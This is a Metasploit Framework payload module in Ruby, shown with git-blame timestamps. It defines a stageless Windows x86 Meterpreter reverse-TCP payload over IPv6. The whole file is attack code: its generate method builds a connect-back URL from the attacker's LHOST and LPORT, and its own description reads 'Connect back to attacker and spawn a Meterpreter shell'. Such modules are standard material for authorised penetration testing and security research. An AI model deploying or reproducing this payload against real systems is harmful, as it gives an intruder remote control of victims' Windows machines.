2015-03-13 10:15:31 +00:00
|
|
|
##
|
|
|
|
|
# This module requires Metasploit: http://metasploit.com/download
|
|
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
|
|
|
##
|
|
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
|
require 'msf/core/handler/reverse_tcp'
|
|
|
|
|
require 'msf/core/payload/windows/stageless_meterpreter'
|
|
|
|
|
require 'msf/base/sessions/meterpreter_x86_win'
|
|
|
|
|
require 'msf/base/sessions/meterpreter_options'
|
|
|
|
|
|
2015-03-30 08:59:30 +00:00
|
|
|
module Metasploit4
|
2015-03-13 10:15:31 +00:00
|
|
|
|
2015-03-16 23:08:13 +00:00
|
|
|
CachedSize = :dynamic
|
|
|
|
|
|
2015-03-13 10:15:31 +00:00
|
|
|
include Msf::Payload::Windows::StagelessMeterpreter
|
|
|
|
|
include Msf::Sessions::MeterpreterOptions
|
|
|
|
|
|
|
|
|
|
def initialize(info = {})
|
|
|
|
|
|
|
|
|
|
super(merge_info(info,
|
|
|
|
|
'Name' => 'Windows Meterpreter Shell, Reverse TCP Inline (IPv6)',
|
|
|
|
|
'Description' => 'Connect back to attacker and spawn a Meterpreter shell',
|
|
|
|
|
'Author' => [ 'OJ Reeves' ],
|
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
|
'Platform' => 'win',
|
|
|
|
|
'Arch' => ARCH_X86,
|
|
|
|
|
'Handler' => Msf::Handler::ReverseTcp,
|
|
|
|
|
'Session' => Msf::Sessions::Meterpreter_x86_Win
|
|
|
|
|
))
|
|
|
|
|
|
|
|
|
|
register_options([
|
|
|
|
|
OptString.new('EXTENSIONS', [false, "Comma-separate list of extensions to load"]),
|
|
|
|
|
OptInt.new("SCOPEID", [false, "The IPv6 Scope ID, required for link-layer addresses", 0])
|
|
|
|
|
], self.class)
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
def generate
|
|
|
|
|
url = "tcp6://#{datastore['LHOST']}:#{datastore['LPORT']}?#{datastore['SCOPEID']}"
|
2015-03-30 03:18:56 +00:00
|
|
|
generate_stageless_x86(url)
|
2015-03-13 10:15:31 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
|
|
end
|
|
|
|
|
|
